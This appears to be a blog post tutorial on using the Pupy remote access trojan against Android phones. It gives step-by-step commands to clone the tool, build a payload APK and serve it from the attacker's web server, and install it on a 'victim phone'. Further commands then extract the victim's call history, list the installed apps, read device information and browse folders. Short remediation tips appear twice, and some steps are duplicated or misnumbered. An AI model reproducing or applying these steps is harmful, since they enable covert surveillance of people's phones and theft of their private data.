Android Hacking by Puppy
Pupy is a cross-platform, multi function RAT and post-exploitation tool .It can communicate using multiple transports, migrate into processes using reflective injection, and load remote python code, python packages and python C-extensions from memory.Machine Used : Kali Linux
IP used (Pvt) : 192.168.3.234
Step 1:
perform the below commands in the Linux
CMD # apt-get updateCMD #apt-get upgrade
CMD # git clone https://github.com/n1nj4sec/pupy.git
CMD # service apache2 start
Step 1:
Run the following command to generate apk with payload
CMD #. /pupygen.py -O android -o /var/www/html/kashy.apk
CMD # ./pupysh.py
CMD #. /pupygen.py -O android -o /var/www/html/kashy.apk
Step 3:
Now navigate to pupy folder and Start pupysh.pyCMD # ./pupysh.py
Step 4:
Install the apk into the victim phone
Step 5:
now back to kali Linux and perform “help” command to display all commands which we can use. as shown in the below images.
Step 6:
now are extracting the call history of an mobile .Type “call –a –output-folder /root/c” to collect call history to folder c in root directory
CMD # call –a –output-folder /root/c
CMD # apps –a –d
CMD # get_info
CMD # ls
Remediation’s :-
Do not install any 3rd party apps into mobile without knowing anything
Use anti-virus software’s
Enable play protection & disable install apps from unknown sources
Keep system up-to-date
Step 7:
Type “apps –a –d” to list all installed applications in the Victim mobileCMD # apps –a –d
Step 8:
Type “get_info” to display Victim Mobile info && “ls” to list foldersCMD # get_info
CMD # ls
Remediation’s :-
Do not install any 3rd party apps into mobile without knowing anything
Use anti-virus software’s
Enable play protection & disable install apps from unknown sources
Keep system up-to-date
Author: G Naveen Kumar.
Website: https://diginfosec.blogspot.com/
Comments
Post a Comment